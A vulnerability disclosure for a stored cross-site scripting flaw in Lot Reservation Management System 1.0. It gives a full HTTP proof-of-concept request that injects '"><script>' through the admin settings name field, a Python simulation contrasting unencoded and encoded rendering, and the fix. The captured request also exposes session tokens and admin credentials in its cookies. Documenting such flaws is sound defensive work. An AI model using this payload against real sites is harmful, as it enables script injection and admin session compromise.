[description]

Lot Reservation Management System 1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the name parameter of the URI /admin/ajax.php?action=save_settings (the site settings save action): the value is accepted unsanitized and is later rendered into the application's HTML, where the "><script> sequence in the PoC breaks out of the surrounding markup.


[Vulnerability Type]

Cross Site Scripting (XSS)


[Vendor of Product]

[Affected Product Code Base]

1.0


[Impact Escalation of Privileges]

true


[POC]
Request payload (note the name form field, which carries the script payload). The endpoint lives under /admin/, so the request is sent with the cookies of a logged-in admin session, as captured below:

POST /admin/ajax.php?action=save_settings HTTP/1.1
Host: 192.168.0.183:11180
Content-Length: 1612
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryhoxIYX3IjU9fyD9z
Origin: http://192.168.0.183:11180
Referer: http://192.168.0.183:11180/admin/index.php?page=site_settings
Accept-Encoding: gzip, deflate, br
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8,en-US;q=0.7
Cookie: i18next=en; Admin-Token=eyJhbGciOiJIUzUxMiJ9.eyJsb2dpbl91c2VyX2tleSI6ImU0ZjJhZWJmLWVkMDEtNGM0OC04YjU4LTI3OTFjMzllMzFmMCJ9.0J-cqM7f9-cNNDe8_Q3CAiWkq4iyNqLDbBUh6mnYfRl1Ygv4HPIp3Ky1cbbpN3_4Zr8lYluJ5-nEunFvF84Xyw; sidebarStatus=0; pro_end=-1; ltd_end=-1; serverType=nginx; order=id%20desc; memSize=32012; sites_path=/www/wwwroot; distribution=ubuntu; force=0; uploadSize=1073741824; rank=a; form_proxy=%5Bobject%20Object%5D; backup_path=/www/backup; _ga=GA1.1.2111016145.1721287966; _ga_J1DQF09WZC=GS1.1.1721287966.1.1.1721292532.0.0.0; weberp_installation=li98qb9dmcjbkupdsthditlpb3; files_sort=name; showRow=2000; Module=AP; PHPSESSIDwebERPteam=hnbgetkfg5o9mdts1ul0tt7a92; name_reverse=True; copyFileName=null; is_admin=false; cutFileName=null; username=admin; userpwd=admin123456; ispwd=1; BatchPaste=2; pnull=1; p-1=nullnot_load; softType=0; load_type=0; p0=1; load_page=1; load_search=apache; SESSIONID=28d91387-18a2-434a-ae96-03bacb61f632.1ddtyn-D2JpW__TOYHawkV5aWtM; request_token=rgTjWkc5GvhSH7vGBAWa0xRtebrkCk3jDrp3Ii2TdrGU3CbY; PHPSESSID=git91lpt9et0atu8q4dg73890i; layers=5; BatchSelected=null; vcodesum=17; Path=/www/wwwroot/111.com
Connection: keep-alive

------WebKitFormBoundaryhoxIYX3IjU9fyD9z
Content-Disposition: form-data; name="name"

Lot Reservation Management System"><script>alert(11)</script>
------WebKitFormBoundaryhoxIYX3IjU9fyD9z
Content-Disposition: form-data; name="email"

info@sample.comm
------WebKitFormBoundaryhoxIYX3IjU9fyD9z
Content-Disposition: form-data; name="contact"

+6948 8542 623
------WebKitFormBoundaryhoxIYX3IjU9fyD9z
Content-Disposition: form-data; name="about"

<p style="text-align: center; background: transparent; position: relative;"><span style="color: rgb(0, 0, 0); font-family: &quot;Open Sans&quot;, Arial, sans-serif; font-weight: 400; text-align: justify;">&nbsp;is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry’s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</span><br></p><p style="text-align: center; background: transparent; position: relative;"><br></p><p style="text-align: center; background: transparent; position: relative;"><br></p><p></p>
------WebKitFormBoundaryhoxIYX3IjU9fyD9z
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryhoxIYX3IjU9fyD9z--
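The following is an added example, not code from this gist or from Lot Reservation Management System. It rebuilds the PoC's multipart body, parses it the way a save_settings handler would populate its form fields, and then renders the stored name into HTML twice: once unencoded and once with attribute-context encoding. The application's real template is not on the page, so the <input value="..."> context below is an assumption chosen because it is the context a "><script> payload breaks out of; the field values other than name, and every function name, are constructed for the example.

```python
import html
import re
from html.parser import HTMLParser

# Boundary and name-field payload copied from the PoC request above.
BOUNDARY = "----WebKitFormBoundaryhoxIYX3IjU9fyD9z"
XSS_PAYLOAD = 'Lot Reservation Management System"><script>alert(11)</script>'


def build_poc_body(name: str, boundary: str = BOUNDARY) -> bytes:
    """Rebuild the PoC multipart body with a chosen 'name' value.
    The other field values are constructed stand-ins for the PoC's."""
    fields = {
        "name": name,
        "email": "info@sample.comm",
        "contact": "+6948 8542 623",
        "about": "<p>About text (constructed)</p>",
    }
    lines = []
    for field, value in fields.items():
        lines += [f"--{boundary}", f'Content-Disposition: form-data; name="{field}"', "", value]
    # Empty file part, as in the PoC ("img" with filename="").
    lines += [f"--{boundary}", 'Content-Disposition: form-data; name="img"; filename=""',
              "Content-Type: application/octet-stream", "", ""]
    lines += [f"--{boundary}--", ""]
    return "\r\n".join(lines).encode()


def parse_multipart(body: bytes, boundary: str) -> dict[str, str]:
    """Minimal multipart/form-data reader for text fields (file parts skipped).
    Stands in for the server populating its POST fields for save_settings."""
    delim = b"--" + boundary.encode()
    fields: dict[str, str] = {}
    for chunk in body.split(delim)[1:]:          # [0] is the (empty) preamble
        if chunk.startswith(b"--"):               # closing delimiter reached
            break
        chunk = chunk.removeprefix(b"\r\n").removesuffix(b"\r\n")
        headers, _, value = chunk.partition(b"\r\n\r\n")
        match = re.search(rb'name="([^"]*)"', headers)
        if match is None or b"filename=" in headers:
            continue
        fields[match.group(1).decode()] = value.decode("utf-8", "replace")
    return fields


def render_vulnerable(settings: dict[str, str]) -> str:
    """Hypothetical template that echoes the stored name into an attribute
    without encoding; the '"><script>' payload closes the attribute and tag."""
    return f'<input type="text" name="name" value="{settings["name"]}">'


def render_fixed(settings: dict[str, str]) -> str:
    """Same template with attribute-context encoding (the PHP equivalent is
    htmlspecialchars($name, ENT_QUOTES, 'UTF-8'))."""
    return f'<input type="text" name="name" value="{html.escape(settings["name"], quote=True)}">'


class ScriptCounter(HTMLParser):
    """Counts <script> elements as an HTML tokenizer would see them."""

    def __init__(self) -> None:
        super().__init__()
        self.scripts = 0

    def handle_starttag(self, tag: str, attrs: list) -> None:
        if tag == "script":
            self.scripts += 1


def count_script_tags(fragment: str) -> int:
    counter = ScriptCounter()
    counter.feed(fragment)
    counter.close()
    return counter.scripts


def simulate(name: str = XSS_PAYLOAD) -> tuple[int, int]:
    """Run a PoC body through the save step and both renderings.
    Returns (script elements in unencoded page, script elements in encoded page)."""
    settings = parse_multipart(build_poc_body(name), BOUNDARY)
    return count_script_tags(render_vulnerable(settings)), count_script_tags(render_fixed(settings))


if __name__ == "__main__":
    vulnerable, fixed = simulate()
    print(f"unencoded output: {vulnerable} <script> element(s); encoded output: {fixed}")
```

Against the live application the equivalent check is to send the PoC and then load the page that displays the site name (the PoC's Referer points at /admin/index.php?page=site_settings): if the response contains the raw "><script>alert(11)</script> rather than an encoded form, the stored value reaches the browser unencoded. Encoding for the output context, as in render_fixed, is the fix; rejecting angle brackets at save time is not sufficient for a value that is also emitted inside attributes.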
